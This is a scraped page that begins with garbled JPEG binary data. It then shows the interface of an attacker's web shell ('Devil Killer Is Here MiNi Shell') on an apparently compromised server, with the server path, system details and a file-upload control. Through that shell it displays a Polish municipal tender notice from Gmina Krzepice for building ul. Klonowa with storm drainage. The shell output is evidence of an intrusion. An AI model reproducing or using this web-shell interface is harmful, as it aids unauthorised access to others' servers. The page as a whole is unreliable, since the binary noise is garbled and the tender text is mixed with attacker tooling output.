JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210602/0007212501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00072125 z dnia 2021-06-02</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ul. Klonowej w Krzepicach wraz z odwodnieniem </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Krzepice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398296</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Częstochowska 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krzepice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-160</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">34 399 91 64</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@krzepice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.krzepice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ul. Klonowej w Krzepicach wraz z odwodnieniem </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7d4487c3-c382-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00072125</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002725/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa ul. Klonowej w Krzepicach wraz z odwodnieniem</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.krzepice.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu<br/>miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod<br/>adresem: https://epuap.gov.pl/wps/portal /umkrzepice/skrytka oraz poczty elektronicznej:<br/>przetargi@krzepice.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Informacje ogólne<br/>1) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>2) Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>3) Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu. <br/>4) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>5) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>6) Identyfikator postępowania dla danego postępowania o udzielenie zamówienia jest dostępny na Liście wszystkich postępowań na miniPortalu oraz stanowi Zał. Nr 10 do SWZ.<br/>2. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert)<br/>1) W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie<br/>oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz<br/>udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem referencyjnym sprawy: ITR.271.004.2021.<br/>2) Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, e-mail: przetargi@krzepice.pl. Zamawiający przekazuje dokumenty na adres poczty elektronicznej<br/>wskazany w formularzu ofertowym Wykonawcy, na co Wykonawca wyraża zgodę wskazując ten adres w ofercie i zobowiązuje się do utrzymania jego funkcjonalności przez czas trwania postępowania.<br/>Domniemywa się, że dokumenty, oświadczenia i wnioski przekazane na adres poczty elektronicznej wskazany w formularzu ofertowym zostały doręczone skutecznie, a Wykonawca zapoznał się z ich<br/>treścią.<br/>3) Dokumenty elektroniczne składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów<br/>elektronicznych za pomocą poczty elektronicznej, na e-mail: przetargi@krzepice.pl. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r., poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegóły w Rozdziale XXII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegóły w Rozdziale XXII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ITR.271.004.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zakres zamówienia obejmuje: <br/>• budowę kolektora kanalizacji deszczowej o długości ok. 280<br/>[m], <br/>• budowę drogi z kostki betonowej o długości 295 [m] z odwodnieniem i włączeniem odwodnienia do ww. kolektora, <br/>• montaż znaków drogowych i urządzeń bezpieczeństwa ruchu<br/>drogowego. Zadanie należy wykonać zgodnie z zakresem określonym dla ul. Klonowej w niżej wymienionych projektach budowlanych, które załączono do niniejszej SWZ: <br/>1) „Budowa sieci kanalizacji deszczowej w ulicach: Andersa, Klonowej, Brzozowej, Lipowej, Jesionowej i Księdza Stasiewicza w Krzepicach.” - pozwolenie na budowę – Decyzja nr 233/16 z 31.05.2016 r. <br/>a) Zamówienie obejmuje budowę następujących odcinków kolektora: od studni D23 z odcinkiem kolektora pomiędzy D23 i D22) do studni D27 (z zaślepieniem tej studni w kierunku D28).<br/>Pozostałe odcinki są poza zakresem zamówienia. <br/>b) Zamawiający nie wyraża zgody na zmianę rur betonowych, z których ma zostać zbudowany kolektor na inny materiał. <br/>2) „Budowa dróg wraz z odwodnieniem w ulicach: Andersa, Klonowa, Brzozowa, Lipowa i ks. Stasiewicza w Krzepicach.” - pozwolenie na budowę – Decyzja nr 474/19 z 26.08.2019 r.<br/>a) Zamówienie obejmuje budowę ul. Klonowej wraz z odwodnieniem. <br/>b) Zamawiający wyraża zgodę na wykonanie przykanalików od wpustów drogowych do zaprojektowanego kolektora kanalizacji<br/>deszczowej z dwuwarstwowych rur PP zamiast rur PVC przewidzianych w projekcie. <br/>3) „PROJEKT STAŁEJ ORGANIZACJI RUCHU DROGOWEGO. Zadanie: Budowa dróg wraz z odwodnieniem w ulicach Andersa, Klonowa, Brzozowa, Lipowa i Ks. Stasiewicza w Krzepicach.”<br/>Za wykonanie inwestycji Zamawiający przewiduje wynagrodzenie ryczałtowe. Dlatego w cenie ofertowej należy uwzględnić wszystkie koszty realizacji inwestycji jakie musi ponieść Wykonawca. Przewidywany termin realizacji inwestycji wynosi 12 miesięcy od daty podpisania umowy. Zamawiający informuje, że:<br/>1) Realizacja zadania będzie się odbywać równolegle z<br/>trwającą inwestycją realizowaną na podstawie tych samych projektów budowlanych, w ramach tych samych pozwoleń budowlanych, co będzie wymagało koordynacji pracz Wykonawcą<br/>trwającej inwestycji. Rozgraniczenie pomiędzy inwestycjami pokazano w załączniku do niniejszej SWZ.<br/>2) Wykonawca nie ponosi opłat za zajęcia pasa drogowego dróg gminnych, ani innych terenów, których właścicielem jest Gmina Krzepice. <br/>3) Obowiązkiem Wykonawcy jest sporządzenie projektów organizacji ruchu drogowego na czas robót, uzyskanie ich<br/>zatwierdzenia, utrzymanie oznakowania w czasie robót.<br/>4) Ponieważ inwestycja jest dofinansowana z Rządowego Funduszu Inwestycji Lokalnych, obowiązkiem wykonawcy będzie<br/>wykonanie i zamontowanie dwóch tablic informacyjnych zawierających informacje o nazwie<br/>funduszu, nazwie zadania oraz kwocie udzielonego dofinansowania.<br/>5) W pasie drogowym budowanych dróg znajduje się infrastruktura, której właścicielami są inne podmioty niż Gmina Krzepice, dlatego w wycenie należy uwzględnić koszty związane z ewentualnym odpłatnym nadzorem nad robotami prowadzonymi w pobliżu tych sieci. Na Wykonawcy będzie ciążył obowiązek informowania zarządców sieci o robotach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zamawiający wymaga wykazania przez Wykonawcę spełnienia warunków określonych w art.<br/>112 ust. 2 PZP dotyczących:1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.2) uprawnień do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.3)<br/>sytuacji ekonomicznej lub finansowej Warunek ten zostanie spełniony, jeżeli Wykonawca<br/>wykaże, że: a) posiada środki finansowe lub zdolność kredytową w wysokości min.300 000,00<br/>zł. b) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną ubezpieczenia nie mniejszą niż<br/>300 000,00 zł.4) zdolności technicznej lub zawodowej Oceniając zdolność techniczną lub<br/>zawodową Wykonawcy, Zamawiający stawia następujące minimalne warunki dotyczące<br/>wykształcenia, kwalifikacji zawodowych, doświadczenia, potencjału technicznego Wykonawcy<br/>lub osób skierowanych przez Wykonawcę do realizacji zamówienia, umożliwiające realizację<br/>zamówienia na odpowiednim poziomie jakości: a) doświadczenie zawodowe Warunek ten<br/>zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie -<br/>wykonał: co najmniej jedno zadanie o wartości nie mniejszej niż 300 000,00 zł, którego<br/>przedmiotem była przebudowa lub budowa drogi publicznej o nawierzchni jezdni z kostki<br/>betonowej lub kostki kamiennej brukowej o powierzchni nie mniejszej niż 1000 m2 (dotyczy<br/>powierzchni jezdni)i co najmniej jedno o wartości nie mniejszej niż 150 000,00 zł, którego<br/>przedmiotem była przebudowa lub budowa kanalizacji deszczowej o długości nie krótszej niż 200<br/>m, lub co najmniej jedno zadanie o wartości nie mniejszej niż 450 000,00 zł, którego przedmiotem<br/>była przebudowa lub budowa drogi publicznej o nawierzchni z kostki betonowej lub kostki<br/>kamiennej brukowej o powierzchni nie mniejszej niż 1000 m2 (dotyczy powierzchni jezdni)i<br/>przebudowa lub budowa kanalizacji deszczowej o długości nie krótszej niż 200 m. b) potencjał<br/>techniczny Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie. c) kadra<br/>techniczna Wykonawca spełni ten warunek udziału w postępowaniu, jeżeli wykaże, że dysponuje<br/>następującymi osobami:1) Kierownik budowy posiadający uprawnienia budowlane* bez<br/>ograniczeń do kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im<br/>ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów;2) Kierownik robót posiadający uprawnienia budowlane* bez ograniczeń do<br/>kierowania robotami budowlanymi w specjalności sieci, instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów,*Przez uprawnienia budowlane Zamawiający rozumie uprawnienia wydane zgodnie z<br/>ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 r., poz. 1333 ze zm.) lub<br/>odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących<br/>przepisów, lub odpowiadające im uprawnienia budowlane, które zostały wydane obywatelom<br/>państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z<br/>zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy z dnia 22<br/>grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (t.j. Dz. U. z 2020 r., poz. 220).Jeżeli w dokumentach<br/>składanych w celu potwierdzenia spełniania warunków udziału w postępowaniu, kwoty będą<br/>wyrażone w walucie obcej, kwoty te zostaną przeliczone na PLN wg średniego kursu PLN w<br/>stosunku do walut obcych ogłaszanego przez Narodowy Bank Polski (Tabela A kursów średnich<br/>walut obcych) w dniu opublikowania ogłoszenia o zamówieniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia<br/>następujących podmiotowych środków dowodowych potwierdzających: 2) brak podstaw wykluczenia: a)<br/>oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej<br/>grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>(Dz. U. z 2020 r. poz. 1076 i 1086),z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej – Załącznik Nr 6 do SWZ; b) odpisu lub informacji z Krajowego Rejestru Sądowego<br/>lub z Centralnej Ewidencjii Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 PZP,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają<br/>wpisu do rejestru lub ewidencji; c) oświadczenia Wykonawcy o aktualności informacji zawartych w<br/>oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, w zakresie podstaw wykluczenia z postępowania<br/>(Załącznik Nr 7 do SWZ), o których mowa w Rozdziale IX pkt 1 SWZ.2. W przypadku Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia podmiotowe środki dowodowe, wymienione w ppkt<br/>2 (tj. na potwierdzenie braku podstaw wykluczenia), składa każdy z Wykonawców występujących<br/>wspólnie.3. W przypadku podmiotu, na którego zdolnościach lub sytuacji Wykonawca polega na<br/>zasadach art. 118 PZP, Wykonawca składa podmiotowe środki dowodowe, wymienione w ppkt 2 (tj. na<br/>potwierdzenie braku podstaw wykluczenia), w odniesieniu do każdego z tych podmiotów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych<br/>na dzień złożenia następujących podmiotowych środków dowodowych potwierdzających: 1) spełnianie<br/>warunków udziału w postępowaniu: a) W celu potwierdzenia spełniania warunku dot. sytuacji<br/>ekonomicznej lub finansowej, o którym mowa w Rozdziale VIII pkt 2 ppkt 3 SWZ, Zamawiający żąda od<br/>Wykonawcy: • informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej<br/>wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie<br/>wcześniejszym niż 3 miesiące przed upływem terminu składania ofert, • dokumentu potwierdzającego,<br/>że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego. Jeżeli z<br/>uzasadnionej przyczyny Wykonawca nie może złożyć dokumentów dot. sytuacji finansowej lub<br/>ekonomicznej wymaganych przez Zamawiającego, może złożyć inny dokument, który w wystarczający<br/>sposób potwierdza spełnianie opisanego przez Zamawiającego warunku udziału w postępowaniu; b) W<br/>celu potwierdzenia spełniania warunku dot. zdolności technicznej lub zawodowej, o którym mowa w<br/>Rozdziale VIII 